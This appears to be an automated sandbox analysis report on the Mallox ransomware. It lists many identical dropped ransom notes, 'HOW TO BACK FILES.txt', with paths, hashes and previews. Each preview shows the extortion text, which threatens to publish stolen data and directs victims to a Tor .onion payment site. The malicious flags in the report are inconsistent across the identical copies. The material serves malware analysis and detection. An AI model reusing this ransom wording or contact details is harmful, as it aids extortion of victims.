                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
